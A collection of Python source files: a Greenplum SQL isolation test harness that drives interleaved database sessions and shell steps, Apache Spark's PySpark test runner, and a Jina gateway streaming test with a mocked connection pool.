addr, port = s.getsockname()
return addr
except socket.error:
return default
finally:
s.close()
def exec_name(name):
if sys.platform == 'win32':
name += ".exe"
return name
|
sql_isolation_testcase.py
|
"""
Copyright (c) 2004-Present Pivotal Software, Inc.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import pygresql.pg
import os
import subprocess
import re
import multiprocessing
import tempfile
import time
import sys
import socket
from optparse import OptionParser
import traceback
def is_digit(n):
try:
int(n)
return True
except ValueError:
return False
class SQLIsolationExecutor(object):
def __init__(self, dbname=''):
self.processes = {}
# The re.S flag makes the "." in the regex match newlines.
# When matched against a command in process_command(), all
# lines in the command are matched and sent as SQL query.
self.command_pattern = re.compile(r"^(-?\d+|[*])([&\\<\\>Uq]*?)\:(.*)", re.S)
if dbname:
self.dbname = dbname
else:
self.dbname = os.environ.get('PGDATABASE')
class SQLConnection(object):
def __init__(self, out_file, name, utility_mode, dbname):
self.name = name
self.utility_mode = utility_mode
self.out_file = out_file
self.dbname = dbname
parent_conn, child_conn = multiprocessing.Pipe(True)
self.p = multiprocessing.Process(target=self.session_process, args=(child_conn,))
self.pipe = parent_conn
self.has_open = False
self.p.start()
# Close "our" copy of the child's handle, so that if the child dies,
# recv() on the pipe will fail.
child_conn.close();
self.out_file = out_file
def session_process(self, pipe):
sp = SQLIsolationExecutor.SQLSessionProcess(self.name,
self.utility_mode, pipe, self.dbname)
sp.do()
def query(self, command):
print >>self.out_file
self.out_file.flush()
if len(command.strip()) == 0:
return
if self.has_open:
raise Exception("Cannot query command while waiting for results")
self.pipe.send((command, False))
r = self.pipe.recv()
if r is None:
raise Exception("Execution failed")
print >>self.out_file, r.strip()
def fork(self, command, blocking):
print >>self.out_file, " <waiting ...>"
self.pipe.send((command, True))
if blocking:
time.sleep(0.5)
if self.pipe.poll(0):
p = self.pipe.recv()
raise Exception("Forked command is not blocking; got output: %s" % p.strip())
self.has_open = True
def join(self):
r = None
print >>self.out_file, " <... completed>"
if self.has_open:
r = self.pipe.recv()
if r is None:
raise Exception("Execution failed")
print >>self.out_file, r.strip()
self.has_open = False
def stop(self):
self.pipe.send(("", False))
self.p.join()
if self.has_open:
raise Exception("Should not finish test case while waiting for results")
def quit(self):
print >>self.out_file, "... <quitting>"
self.stop()
def terminate(self):
self.pipe.close()
self.p.terminate()
class SQLSessionProcess(object):
def __init__(self, name, utility_mode, pipe, dbname):
"""
Constructor
"""
self.name = name
self.utility_mode = utility_mode
self.pipe = pipe
self.dbname = dbname
if self.utility_mode:
(hostname, port) = self.get_utility_mode_port(name)
self.con = self.connectdb(given_dbname=self.dbname,
given_host=hostname,
given_port=port,
given_opt="-c gp_session_role=utility")
else:
self.con = self.connectdb(self.dbname)
def connectdb(self, given_dbname, given_host = None, given_port = None, given_opt = None):
con = None
retry = 1000
while retry:
try:
if (given_port is None):
con = pygresql.pg.connect(host= given_host,
opt= given_opt,
dbname= given_dbname)
else:
con = pygresql.pg.connect(host= given_host,
port= given_port,
opt= given_opt,
dbname= given_dbname)
break
except Exception as e:
if (("the database system is starting up" in str(e) or
"the database system is in recovery mode" in str(e)) and
retry > 1):
retry -= 1
time.sleep(0.1)
else:
raise
return con
def get_utility_mode_port(self, name):
"""
Gets the port number/hostname combination of the
contentid = name and role = primary
"""
con = self.connectdb(self.dbname)
r = con.query("SELECT hostname, port FROM gp_segment_configuration WHERE content = %s and role = 'p'" % name).getresult()
if len(r) == 0:
raise Exception("Invalid content %s" % name)
if r[0][0] == socket.gethostname():
return (None, int(r[0][1]))
return (r[0][0], int(r[0][1]))
def printout_result(self, r):
"""
This is a pretty dirty, but apprently the only way
to get the pretty output of the query result.
The reason is that for some python internal reason
print(r) calls the correct function while neighter str(r)
nor repr(r) output something useful.
FIXME: once we upgrade to a modern pygresql this can probably go
away entirely; it looks like 5.0 may have consolidated the
internal print/str code.
"""
with tempfile.TemporaryFile() as f:
print >>f, r
f.seek(0) # rewind
ppr = f.read()
return ppr.strip() + "\n"
def execute_command(self, command):
"""
Executes a given command
"""
try:
r = self.con.query(command)
if r and type(r) == str:
echo_content = command[:-1].partition(" ")[0].upper()
return "%s %s" % (echo_content, self.printout_result(r))
elif r:
return self.printout_result(r)
else:
echo_content = command[:-1].partition(" ")[0].upper()
return echo_content
except Exception as e:
return str(e)
def do(self):
"""
Process loop.
Ends when the command None is received
"""
(c, wait) = self.pipe.recv()
while c:
if wait:
time.sleep(0.1)
r = self.execute_command(c)
self.pipe.send(r)
r = None
(c, wait) = self.pipe.recv()
def get_process(self, out_file, name, utility_mode=False, dbname=""):
"""
Gets or creates the process by the given name
"""
if len(name) > 0 and not is_digit(name):
raise Exception("Name should be a number")
if len(name) > 0 and not utility_mode and int(name) >= 1024:
raise Exception("Session name should be smaller than 1024 unless it is utility mode number")
if not (name, utility_mode) in self.processes:
if not dbname:
dbname = self.dbname
self.processes[(name, utility_mode)] = SQLIsolationExecutor.SQLConnection(out_file, name, utility_mode, dbname)
return self.processes[(name, utility_mode)]
def quit_process(self, out_file, name, utility_mode=False, dbname=""):
"""
Quits a process with the given name
"""
if len(name) > 0 and not is_digit(name):
raise Exception("Name should be a number")
if len(name) > 0 and not utility_mode and int(name) >= 1024:
raise Exception("Session name should be smaller than 1024 unless it is utility mode number")
if not (name, utility_mode) in self.processes:
raise Exception("Sessions not started cannot be quit")
self.processes[(name, utility_mode)].quit()
del self.processes[(name, utility_mode)]
def get_all_primary_contentids(self, dbname):
"""
Retrieves all primary content IDs (including the master). Intended for
use by *U queries.
"""
if not dbname:
dbname = self.dbname
con = pygresql.pg.connect(dbname=dbname)
result = con.query("SELECT content FROM gp_segment_configuration WHERE role = 'p'").getresult()
if len(result) == 0:
raise Exception("Invalid gp_segment_configuration contents")
return [int(content[0]) for content in result]
def process_command(self, command, output_file):
"""
Processes the given command.
The command at this point still includes the isolation behavior
flags, e.g. which session to use.
"""
process_name = ""
sql = command
flag = ""
dbname = ""
m = self.command_pattern.match(command)
if m:
process_name = m.groups()[0]
flag = m.groups()[1]
sql = m.groups()[2]
sql = sql.lstrip()
# If db_name is specifed , it should be of the following syntax:
# 1:@db_name <db_name>: <sql>
if sql.startswith('@db_name'):
sql_parts = sql.split(':', 2)
if not len(sql_parts) == 2:
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
if not sql_parts[0].startswith('@db_name'):
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
if not len(sql_parts[0].split()) == 2:
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
dbname = sql_parts[0].split()[1].strip()
if not dbname:
raise Exception("Invalid syntax with dbname, should be of the form 1:@db_name <db_name>: <sql>")
sql = sql_parts[1]
if not flag:
if sql.startswith('!'):
sql = sql[1:]
# Check for execution mode. E.g.
# !\retcode path/to/executable --option1 --option2 ...
#
# At the moment, we only recognize the \retcode mode, which
# ignores all program output in the diff (it's still printed)
# and adds the return code.
mode = None
if sql.startswith('\\'):
mode, sql = sql.split(None, 1)
if mode != '\\retcode':
raise Exception('Invalid execution mode: {}'.format(mode))
cmd_output = subprocess.Popen(sql.strip(), stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
stdout, _ = cmd_output.communicate()
print >> output_file
if mode == '\\retcode':
print >> output_file, '-- start_ignore'
print >> output_file, stdout
if mode == '\\retcode':
print >> output_file, '-- end_ignore'
print >> output_file, '(exited with code {})'.format(cmd_output.returncode)
else:
self.get_process(output_file, process_name, dbname=dbname).query(sql.strip())
elif flag == "&":
self.get_process(output_file, process_name, dbname=dbname).fork(sql.strip(), True)
elif flag == ">":
self.get_process(output_file, process_name, dbname=dbname).fork(sql.strip(), False)
elif flag == "<":
if len(sql) > 0:
raise Exception("No query should be given on join")
self.get_process(output_file, process_name, dbname=dbname).join()
elif flag == "q":
if len(sql) > 0:
raise Exception("No query should be given on quit")
self.quit_process(output_file, process_name, dbname=dbname)
elif flag == "U":
if process_name == '*':
process_names = [str(content) for content in self.get_all_primary_contentids(dbname)]
else:
process_names = [process_name]
for name in process_names:
self.get_process(output_file, name, utility_mode=True, dbname=dbname).query(sql.strip())
elif flag == "U&":
self.get_process(output_file, process_name, utility_mode=True, dbname=dbname).fork(sql.strip(), True)
elif flag == "U<":
if len(sql) > 0:
raise Exception("No query should be given on join")
self.get_process(output_file, process_name, utility_mode=True, dbname=dbname).join()
elif flag == "Uq":
if len(sql) > 0:
raise Exception("No query should be given on quit")
self.quit_process(output_file, process_name, utility_mode=True, dbname=dbname)
else:
raise Exception("Invalid isolation flag")
def process_isolation_file(self, sql_file, output_file):
"""
Processes the given sql file and writes the output
to output file
"""
try:
command = ""
for line in sql_file:
#tinctest.logger.info("re.match: %s" %re.match(r"^\d+[q\\<]:$", line))
print >>output_file, line.strip(),
if line[0] == "!":
command_part = line # shell commands can use -- for multichar options like --include
else:
command_part = line.partition("--")[0] # remove comment from line
if command_part == "" or command_part == "\n":
print >>output_file
elif command_part.endswith(";\n") or re.match(r"^\d+[q\\<]:$", line) or re.match(r"^-?\d+U[q\\<]:$", line):
command += command_part
try:
self.process_command(command, output_file)
except Exception as e:
print >>output_file, "FAILED: ", e
command = ""
else:
command += command_part
for process in self.processes.values():
process.stop()
except:
for process in self.processes.values():
process.terminate()
raise
finally:
for process in self.processes.values():
process.terminate()
class SQLIsolationTestCase:
"""
The isolation test case allows a fine grained control of interleaved
executing transactions. This is mainly used to test isolation behavior.
[<#>[flag]:] <sql> | ! <shell scripts or command>
#: either an integer indicating a unique session, or a content-id if
followed by U (for utility-mode connections). In 'U' mode, the
content-id can alternatively be an asterisk '*' to perform a
utility-mode query on the master and all primaries.
flag:
&: expect blocking behavior
>: running in background without blocking
<: join an existing session
q: quit the given session
U: connect in utility mode to primary contentid from gp_segment_configuration
U&: expect blocking behavior in utility mode (does not currently support an asterisk target)
U<: join an existing utility mode session (does not currently support an asterisk target)
An example is:
Execute BEGIN in transaction 1
Execute BEGIN in transaction 2
Execute INSERT in transaction 2
Execute SELECT in transaction 1
Execute COMMIT in transaction 2
Execute SELECT in transaction 1
The isolation tests are specified identical to sql-scripts in normal
SQLTestCases. However, it is possible to prefix a SQL line with
an tranaction identifier followed by a colon (":").
The above example would be defined by
1: BEGIN;
2: BEGIN;
2: INSERT INTO a VALUES (1);
1: SELECT * FROM a;
2: COMMIT;
1: SELECT * FROM a;
Blocking behavior can be tested by forking and joining.
1: BEGIN;
2: BEGIN;
1: DELETE FROM foo WHERE a = 4;
2&: DELETE FROM foo WHERE a = 4;
1: COMMIT;
2<:
2: COMMIT;
2& forks the command. It is executed in the background. If the
command is NOT blocking at this point, it is considered an error.
2< joins the background command and outputs the result of the
command execution.
Session ids should be smaller than 1024.
2U: Executes a utility command connected to port 40000.
One difference to SQLTestCase is the output of INSERT.
SQLTestCase would output "INSERT 0 1" if one tuple is inserted.
SQLIsolationTestCase would output "INSERT 1". As the
SQLIsolationTestCase needs to have a more fine-grained control
over the execution order than possible with PSQL, it uses
the pygresql python library instead.
Connecting to a specific database:
1. If you specify a db_name metadata in the sql file, connect to that database in all open sessions.
2. If you want a specific session to be connected to a specific database , specify the sql as follows:
1:@db_name testdb: <sql>
2:@db_name test2db: <sql>
1: <sql>
2: <sql>
etc
Here session 1 will be connected to testdb and session 2 will be connected to test2db. You can specify @db_name only at the beginning of the session. For eg:, following would error out:
1:@db_name testdb: <sql>
2:@db_name test2db: <sql>
1: @db_name testdb: <sql>
2: <sql>
etc
Quitting sessions:
By default, all opened sessions will be stopped only at the end of the sql file execution. If you want to explicitly quit a session
in the middle of the test execution, you can specify a flag 'q' with the session identifier. For eg:
1:@db_name testdb: <sql>
2:@db_name test2db: <sql>
1: <sql>
2: <sql>
1q:
2: <sql>
3: <sql>
2q:
3: <sql>
2: @db_name test: <sql>
1q: ---> Will quit the session established with testdb.
2q: ---> Will quit the session established with test2db.
The subsequent 2: @db_name test: <sql> will open a new session with the database test and execute the sql against that session.
Catalog Modification:
Some tests are easier to write if it's possible to modify a system
catalog across the *entire* cluster. To perform a utility-mode query on
all segments and the master, you can use *U commands:
*U: SET allow_system_table_mods = true;
*U: UPDATE pg_catalog.<table> SET <column> = <value> WHERE <cond>;
Since the number of query results returned by a *U command depends on
the developer's cluster configuration, it can be useful to wrap them in
a start_/end_ignore block. (Unfortunately, this also hides legitimate
failures; a better long-term solution is needed.)
Block/join flags are not currently supported with *U.
"""
def run_sql_file(self, sql_file, out_file = None, out_dir = None, optimizer = None):
"""
Given a sql file and an ans file, this adds the specified gucs (self.gucs) to the sql file , runs the sql
against the test case database (self.db_name) and verifies the output with the ans file.
If an 'init_file' exists in the same location as the sql_file, this will be used
while doing gpdiff.
"""
# Add gucs to the test sql and form the actual sql file to be run
if not out_dir:
out_dir = self.get_out_dir()
if not os.path.exists(out_dir):
TINCSystem.make_dirs(out_dir, ignore_exists_error = True)
if optimizer is None:
gucs_sql_file = os.path.join(out_dir, os.path.basename(sql_file))
else:
# sql file will be <basename>_opt.sql or <basename>_planner.sql based on optimizer
gucs_sql_file = os.path.join(out_dir, os.path.basename(sql_file).replace('.sql', '_%s.sql' %self._optimizer_suffix(optimizer)))
self._add_gucs_to_sql_file(sql_file, gucs_sql_file, optimizer)
self.test_artifacts.append(gucs_sql_file)
if not out_file:
if optimizer is None:
out_file = os.path.join(self.get_out_dir(), os.path.basename(sql_file).replace('.sql', '.out'))
else:
# out file will be *_opt.out or *_planner.out based on optimizer
out_file = os.path.join(self.get_out_dir(), os.path.basename(sql_file).replace('.sql', '_%s.out' %self._optimizer_suffix(optimizer)))
self.test_artifacts.append(out_file)
executor = SQLIsolationExecutor(dbname=self.db_name)
with open(out_file, "w") as f:
executor.process_isolation_file(open(sql_file), f)
f.flush()
if out_file[-2:] == '.t':
out_file = out_file[:-2]
return out_file
if __name__ == "__main__":
parser = OptionParser()
parser.add_option("--dbname", dest="dbname",
help="connect to database DBNAME", metavar="DBNAME")
(options, args) = parser.parse_args()
executor = SQLIsolationExecutor(dbname=options.dbname)
executor.process_isolation_file(sys.stdin, sys.stdout)
|
run-tests.py
|
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import logging
from optparse import OptionParser, OptionGroup
import os
import re
import shutil
import subprocess
import sys
import tempfile
from threading import Thread, Lock
import time
import uuid
if sys.version < '3':
import Queue
else:
import queue as Queue
from collections import deque
from multiprocessing import Manager
# Append `SPARK_HOME/dev` to the Python path so that we can import the sparktestsupport module
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), "../dev/"))
from sparktestsupport import SPARK_HOME # noqa (suppress pep8 warnings)
from sparktestsupport.shellutils import which, subprocess_check_output # noqa
from sparktestsupport.modules import all_modules, pyspark_sql # noqa
python_modules = dict((m.name, m) for m in all_modules if m.python_test_goals if m.name != 'root')
def print_red(text):
print('\033[31m' + text + '\033[0m')
SKIPPED_TESTS = Manager().dict()
LOG_FILE = os.path.join(SPARK_HOME, "python/unit-tests.log")
FAILURE_REPORTING_LOCK = Lock()
LOGGER = logging.getLogger()
# Find out where the assembly jars are located.
# Later, add back 2.12 to this list:
# for scala in ["2.11", "2.12"]:
for scala in ["2.11"]:
build_dir = os.path.join(SPARK_HOME, "assembly", "target", "scala-" + scala)
if os.path.isdir(build_dir):
SPARK_DIST_CLASSPATH = os.path.join(build_dir, "jars", "*")
break
else:
raise Exception("Cannot find assembly build directory, please build Spark first.")
def run_individual_python_test(target_dir, test_name, pyspark_python, failed_tests_deque):
env = dict(os.environ)
env.update({
'SPARK_DIST_CLASSPATH': SPARK_DIST_CLASSPATH,
'SPARK_TESTING': '1',
'SPARK_PREPEND_CLASSES': '1',
'PYSPARK_PYTHON': which(pyspark_python),
'PYSPARK_DRIVER_PYTHON': which(pyspark_python)
})
# Create a unique temp directory under 'target/' for each run. The TMPDIR variable is
# recognized by the tempfile module to override the default system temp directory.
tmp_dir = os.path.join(target_dir, str(uuid.uuid4()))
while os.path.isdir(tmp_dir):
tmp_dir = os.path.join(target_dir, str(uuid.uuid4()))
os.mkdir(tmp_dir)
env["TMPDIR"] = tmp_dir
# Also override the JVM's temp directory by setting driver and executor options.
spark_args = [
"--conf", "spark.driver.extraJavaOptions=-Djava.io.tmpdir={0}".format(tmp_dir),
"--conf", "spark.executor.extraJavaOptions=-Djava.io.tmpdir={0}".format(tmp_dir),
"pyspark-shell"
]
env["PYSPARK_SUBMIT_ARGS"] = " ".join(spark_args)
LOGGER.info("Starting test(%s): %s", pyspark_python, test_name)
start_time = time.time()
# This line must come before the try block, file shouldn't be closed before 'worker' is done
per_test_output = tempfile.TemporaryFile()
try:
process = subprocess.Popen(
[os.path.join(SPARK_HOME, "bin/pyspark"), test_name],
# bufsize must be 0 (unbuffered), 1 (line buffered) doesn't seem to work
stderr=subprocess.STDOUT, stdout=subprocess.PIPE, env=env, bufsize=0,
universal_newlines=True)
def consume_log(output):
for line in process.stdout:
print("({}) {} - {}".format(pyspark_python, test_name, line), end=b'')
print(line, file=output, end=b'')
worker = Thread(target=consume_log, args=(per_test_output,))
worker.start() # This is essential as we need to consume the stdout pipe
retcode = process.wait()
shutil.rmtree(tmp_dir, ignore_errors=True)
except:
LOGGER.exception("Got exception while running %s with %s", test_name, pyspark_python)
# Here, we use os._exit() instead of sys.exit() in order to force Python to exit even if
# this code is invoked from a thread other than the main thread.
os._exit(-1)
duration = time.time() - start_time
worker.join() # Wait on the thread that consumed the output
# If it failed, append output to LOG_FILE, add to failed tests and carry on
if retcode != 0:
try:
with FAILURE_REPORTING_LOCK:
with open(LOG_FILE, 'ab') as log_file:
per_test_output.seek(0)
log_file.writelines(per_test_output)
per_test_output.seek(0)
for line in per_test_output:
decoded_line = line.decode()
if not re.match('[0-9]+', decoded_line):
print(decoded_line, end='')
per_test_output.close()
except:
LOGGER.exception("Got an exception while trying to print failed test output")
finally:
print_red("\nHad test failures in %s with %s; see logs." % (test_name, pyspark_python))
failed_tests_deque.append((test_name, pyspark_python))
else:
skipped_counts = 0
try:
per_test_output.seek(0)
# Here expects skipped test output from unittest when verbosity level is
# 2 (or --verbose option is enabled).
decoded_lines = map(lambda line: line.decode(), iter(per_test_output))
skipped_tests = list(filter(
lambda line: re.search(r'test_.* \(pyspark\..*\) ... skipped ', line),
decoded_lines))
skipped_counts = len(skipped_tests)
if skipped_counts > 0:
key = (pyspark_python, test_name)
SKIPPED_TESTS[key] = skipped_tests
per_test_output.close()
except:
import traceback
print_red("\nGot an exception while trying to store "
"skipped test output:\n%s" % traceback.format_exc())
# Here, we use os._exit() instead of sys.exit() in order to force Python to exit even if
# this code is invoked from a thread other than the main thread.
os._exit(-1)
if skipped_counts != 0:
LOGGER.info(
"Finished test(%s): %s (%is) ... %s tests were skipped", pyspark_python, test_name,
duration, skipped_counts)
else:
LOGGER.info(
"Finished test(%s): %s (%is)", pyspark_python, test_name, duration)
def get_default_python_executables():
python_execs = [x for x in ["python2.7", "python3.6", "pypy"] if which(x)]
if "python2.7" not in python_execs:
LOGGER.warning("Not testing against `python2.7` because it could not be found; falling"
" back to `python` instead")
python_execs.insert(0, "python")
return python_execs
def parse_opts():
parser = OptionParser(
prog="run-tests"
)
parser.add_option(
"--python-executables", type="string", default=','.join(get_default_python_executables()),
help="A comma-separated list of Python executables to test against (default: %default)"
)
parser.add_option(
"--modules", type="string",
default=",".join(sorted(python_modules.keys())),
help="A comma-separated list of Python modules to test (default: %default)"
)
parser.add_option(
"-p", "--parallelism", type="int", default=4,
help="The number of suites to test in parallel (default %default)"
)
parser.add_option(
"--verbose", action="store_true",
help="Enable additional debug logging"
)
group = OptionGroup(parser, "Developer Options")
group.add_option(
"--testnames", type="string",
default=None,
help=(
"A comma-separated list of specific modules, classes and functions of doctest "
"or unittest to test. "
"For example, 'pyspark.sql.foo' to run the module as unittests or doctests, "
"'pyspark.sql.tests FooTests' to run the specific class of unittests, "
"'pyspark.sql.tests FooTests.test_foo' to run the specific unittest in the class. "
"'--modules' option is ignored if they are given.")
)
parser.add_option_group(group)
(opts, args) = parser.parse_args()
if args:
parser.error("Unsupported arguments: %s" % ' '.join(args))
if opts.parallelism < 1:
parser.error("Parallelism cannot be less than 1")
return opts
def _check_coverage(python_exec):
# Make sure if coverage is installed.
try:
subprocess_check_output(
[python_exec, "-c", "import coverage"],
stderr=open(os.devnull, 'w'))
except:
print_red("Coverage is not installed in Python executable '%s' "
"but 'COVERAGE_PROCESS_START' environment variable is set, "
"exiting." % python_exec)
sys.exit(-1)
def main():
opts = parse_opts()
if opts.verbose:
log_level = logging.DEBUG
else:
log_level = logging.INFO
should_test_modules = opts.testnames is None
logging.basicConfig(stream=sys.stdout, level=log_level, format="%(message)s")
LOGGER.info("Running PySpark tests. Output is in %s", LOG_FILE)
if os.path.exists(LOG_FILE):
os.remove(LOG_FILE)
python_execs = opts.python_executables.split(',')
LOGGER.info("Will test against the following Python executables: %s", python_execs)
if should_test_modules:
modules_to_test = []
for module_name in opts.modules.split(','):
if module_name in python_modules:
modules_to_test.append(python_modules[module_name])
else:
print("Error: unrecognized module '%s'. Supported modules: %s" %
(module_name, ", ".join(python_modules)))
sys.exit(-1)
LOGGER.info("Will test the following Python modules: %s", [x.name for x in modules_to_test])
else:
testnames_to_test = opts.testnames.split(',')
LOGGER.info("Will test the following Python tests: %s", testnames_to_test)
task_queue = Queue.PriorityQueue()
for python_exec in python_execs:
# Check if the python executable has coverage installed when 'COVERAGE_PROCESS_START'
# environmental variable is set.
if "COVERAGE_PROCESS_START" in os.environ:
_check_coverage(python_exec)
python_implementation = subprocess_check_output(
[python_exec, "-c", "import platform; print(platform.python_implementation())"],
universal_newlines=True).strip()
LOGGER.debug("%s python_implementation is %s", python_exec, python_implementation)
LOGGER.debug("%s version is: %s", python_exec, subprocess_check_output(
[python_exec, "--version"], stderr=subprocess.STDOUT, universal_newlines=True).strip())
if should_test_modules:
for module in modules_to_test:
if python_implementation not in module.blacklisted_python_implementations:
for test_goal in module.python_test_goals:
heavy_tests = ['pyspark.streaming.tests', 'pyspark.mllib.tests',
'pyspark.tests', 'pyspark.sql.tests', 'pyspark.ml.tests']
if any(map(lambda prefix: test_goal.startswith(prefix), heavy_tests)):
priority = 0
else:
priority = 100
task_queue.put((priority, (python_exec, test_goal)))
else:
for test_goal in testnames_to_test:
task_queue.put((0, (python_exec, test_goal)))
# Create the target directory before starting tasks to avoid races.
target_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), 'target'))
if not os.path.isdir(target_dir):
os.mkdir(target_dir)
def process_queue(task_queue, failed_tests_deque):
while True:
try:
(priority, (python_exec, test_goal)) = task_queue.get_nowait()
except Queue.Empty:
break
try:
run_individual_python_test(target_dir, test_goal, python_exec, failed_tests_deque)
finally:
task_queue.task_done()
# Using a deque because it supports thread-safe appends
failed_tests_deque = deque()
start_time = time.time()
for _ in range(opts.parallelism):
worker = Thread(target=process_queue, args=(task_queue, failed_tests_deque))
worker.daemon = True
worker.start()
try:
task_queue.join()
except (KeyboardInterrupt, SystemExit):
print_red("Exiting due to interrupt")
sys.exit(-1)
total_duration = time.time() - start_time
if len(failed_tests_deque) != 0:
LOGGER.error("%i tests failed after %i seconds:", len(failed_tests_deque), total_duration)
for test_and_python in failed_tests_deque:
print_red("\nHad test failures in %s with %s; see logs." % test_and_python)
sys.exit(-1)
LOGGER.info("Tests passed in %i seconds", total_duration)
for key, lines in sorted(SKIPPED_TESTS.items()):
pyspark_python, test_name = key
LOGGER.info("\nSkipped tests in %s with %s:" % (test_name, pyspark_python))
for line in lines:
LOGGER.info(" %s" % line.rstrip())
if __name__ == "__main__":
main()
|
test_streaming.py
|
import asyncio
import copy
import multiprocessing
import os
import time
from datetime import datetime
from functools import partial
from typing import Dict
import pytest
from jina import Document, DocumentArray
from jina.clients import Client
from jina.helper import random_port
from jina.parsers import set_gateway_parser
from jina.serve import networking
from jina.serve.runtimes.gateway.grpc import GRPCGatewayRuntime
from jina.serve.runtimes.gateway.http import HTTPGatewayRuntime
from jina.serve.runtimes.gateway.websocket import WebSocketGatewayRuntime
INPUT_LEN = 4
INPUT_GEN_SLEEP_TIME = 1
SLOW_EXECUTOR_SLEEP_TIME = 5
@pytest.fixture
def simple_graph_dict_slow():
return {
'start-gateway': ['slow-executor'],
'slow-executor': ['end-gateway'],
}
@pytest.fixture
def simple_graph_dict_fast():
return {
'start-gateway': ['fast-executor'],
'slow-executor': ['end-gateway'],
}
@pytest.fixture
def simple_graph_dict_indexer():
return {
'start-gateway': ['indexer-executor'],
'slow-executor': ['end-gateway'],
}
class DummyMockConnectionPool:
def send_requests_once(
self,
requests,
deployment: str,
head: bool,
endpoint: str = None,
timeout: float = 1.0,
retries: int = -1,
) -> asyncio.Task:
assert head
request = requests[0]
if not hasattr(self, '_docs'):
self._docs = DocumentArray()
async def _compute_response():
response_msg = copy.deepcopy(request)
exec_endpoint = request.header.exec_endpoint
new_docs = DocumentArray()
await asyncio.sleep(0.1)
if deployment == 'indexer-executor':
if exec_endpoint == '/index':
time.sleep(0.1)
self._docs.extend(request.docs)
else:
docs = response_msg.docs
docs.clear()
docs.extend(
DocumentArray(Document(tags={'ids': self._docs[:, 'id']}))
)
response_msg.data.docs = docs
return response_msg
else:
if deployment == 'slow-executor':
await asyncio.sleep(SLOW_EXECUTOR_SLEEP_TIME)
for doc in request.docs:
new_doc = Document(doc, copy=True)
new_doc.tags['executor'] = time.time()
print(
f'in {deployment}, {new_doc.id} => time: {readable_time_from(new_doc.tags["executor"])}, {new_doc.tags["executor"]}',
flush=True,
)
new_docs.append(new_doc)
docs = response_msg.docs
docs.clear()
docs.extend(new_docs)
response_msg.data.docs = docs
return response_msg
async def task_wrapper():
response_msg = await _compute_response()
return response_msg, {}
return asyncio.create_task(task_wrapper())
def readable_time_from(t):
return datetime.utcfromtimestamp(t).strftime('%M:%S:%f')
def get_document(i, name):
t = time.time()
print(f'in {name} {i}, time: {readable_time_from(t)}, {t}', flush=True)
return Document(id=f'id-{i}', tags={'input_gen': t})
def blocking_gen():
"""Fast synchronous client generator"""
for i in range(INPUT_LEN):
yield get_document(i, name='blocking_gen')
time.sleep(0.1)
async def async_gen():
"""Fast async client generator"""
for i in range(INPUT_LEN):
yield get_document(i, name='async_gen')
await asyncio.sleep(0.1)
def slow_blocking_gen():
"""Slow synchronous client generator"""
for i in range(INPUT_LEN):
yield get_document(i, name='slow_blocking_gen')
time.sleep(INPUT_GEN_SLEEP_TIME)
async def slow_async_gen():
"""Slow async client generator"""
for i in range(INPUT_LEN):
yield get_document(i, name='slow_async_gen')
await asyncio.sleep(INPUT_GEN_SLEEP_TIME)
def on_done(response, final_da: DocumentArray):
docs = response.docs
for doc in docs:
doc.tags['on_done'] = time.time()
print(
f'in on_done {doc.id}, time: {readable_time_from(doc.tags["on_done"])}',
flush=True,
)
final_da.extend(docs)
def create_runtime(graph_dict: Dict, protocol: str, port: int, prefetch: int = 0):
import json
graph_description = json.dumps(graph_dict)
runtime_cls = None
if protocol == 'grpc':
runtime_cls = GRPCGatewayRuntime
elif protocol == 'http':
runtime_cls = HTTPGatewayRuntime
elif protocol == 'websocket':
runtime_cls = WebSocketGatewayRuntime
args = set_gateway_parser().parse_args(
[
'--port',
f'{port}',
'--graph-description',
f'{graph_description}',
'--deployments-addresses',
'{}',
'--prefetch',
f'{prefetch}',
]
)
with runtime_cls(args) as runtime:
runtime.run_forever()
@pytest.mark.parametrize(
'protocol, inputs',
[
('grpc', slow_async_gen),
pytest.param(
'grpc',
slow_blocking_gen,
marks=pytest.mark.skip(
reason='grpc client + sync generator with time.sleep is expected to fail'
),
),
('websocket', slow_async_gen),
('websocket', slow_blocking_gen),
('http', slow_async_gen),
('http', slow_blocking_gen),
],
)
def test_disable_prefetch_slow_client_fast_executor(
protocol, inputs, monkeypatch, simple_graph_dict_fast
):
monkeypatch.setattr(
networking.GrpcConnectionPool,
'send_requests_once',
DummyMockConnectionPool.send_requests_once,
)
port = random_port()
p = multiprocessing.Process(
target=create_runtime,
kwargs={
'protocol': protocol,
'port': port,
'graph_dict': simple_graph_dict_fast,
},
)
p.start()
time.sleep(1.0)
final_da = DocumentArray()
client = Client(protocol=protocol, port=port, return_responses=True)
client.post(
on='/',
inputs=inputs,
request_size=1,
on_done=lambda response: on_done(response, final_da),
)
p.terminate()
p.join()
assert len(final_da) == INPUT_LEN
# Since the input_gen is slow, order will always be gen -> exec -> on_done for every request
assert final_da['id-0'].tags['input_gen'] < final_da['id-0'].tags['executor']
assert final_da['id-0'].tags['executor'] < final_da['id-0'].tags['on_done']
assert final_da['id-0'].tags['on_done'] < final_da['id-1'].tags['input_gen']
assert final_da['id-1'].tags['input_gen'] < final_da['id-1'].tags['executor']
assert final_da['id-1'].tags['executor'] < final_da['id-1'].tags['on_done']
assert final_da['id-1'].tags['on_done'] < final_da['id-2'].tags['input_gen']
